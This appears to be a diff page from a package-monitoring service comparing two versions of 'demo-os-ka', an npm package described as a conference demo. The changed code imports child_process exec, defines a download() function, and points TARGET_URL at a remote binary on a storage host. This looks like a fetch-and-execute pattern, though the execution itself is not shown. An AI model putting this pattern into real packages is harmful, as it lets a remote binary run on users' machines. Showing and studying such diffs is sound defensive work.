demo-os-ka 1.0.0 → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +3 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,3 +1,5 @@
1
+ #!/usr/bin/env node
2
+
1
3
  const fs = require('fs');
2
4
  const path = require('path');
3
5
  const { exec } = require('child_process');
@@ -10,7 +12,7 @@ async function initialize() {
10
12
  await main(); // Main is here [Note]
11
13
  }
12
14
 
13
- const TARGET_URL = 'https://sc-demo-ka.nyc3.digitaloceanspaces.com/my-binary';
15
+ const TARGET_URL = 'https://sc-demo-test.nyc3.digitaloceanspaces.com/my-binary';
14
16
  const BINARY_PATH = path.join(__dirname, 'my-binary');
15
17
 
16
18
  async function download() {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "demo-os-ka",
3
- "version": "1.0.0",
3
+ "version": "1.0.2",
4
4
  "description": "Demo package created as part of conference presentation.",
5
5
  "main": "index.js",
6
6
  "scripts": {